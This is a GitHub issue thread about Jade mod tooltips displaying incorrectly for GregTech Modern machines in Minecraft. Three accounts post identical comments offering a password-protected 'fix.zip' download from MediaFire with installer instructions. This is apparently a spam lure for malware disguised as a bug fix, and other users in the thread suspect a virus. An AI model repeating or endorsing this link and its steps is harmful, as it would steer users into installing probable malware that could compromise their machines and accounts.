### ISSUE TITLE
For GregTech Modern's machine, the Tooltip was not displayed correctly

### ISSUE THREAD

**Issue by terryaxe** [Snownee/Jade#459]
### Mod loader

Please select

### Minecraft version

1.20.1

### Mod version

11.10.1

### Modloader version

NeoForge-47.1.106

### [IMPORTANT] If bug:

- [X] I have confirmed this bug is reproducible on a minimal setup, not a modpack with many other mods.

### [IMPORTANT] If bug: The **latest.log** file, not the crash report

[None](https://mclo.gs/xbgewEk)

### Issue description

![952bebe127742ac414d67029b451e751_720](https://github.com/user-attachments/assets/680cfc09-ff15-4937-93f6-a519a589f484)
GTM version：gtceu-1.20.1-1.4.0

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by terryaxe** [comment]
what

**Comment by obsidianaxe** [comment]
what

**Comment by terryaxe** [comment]
> Download https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file password: changeme In the installer menu, select "gcc."

virus?

**Comment by obsidianaxe** [comment]
> > 下载 https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file 密码：changeme 在安装程序菜单中，选择“gcc”。
> 
> 病毒？

It looks like a virus

**Comment by Snownee** [comment]
please report it to GTM
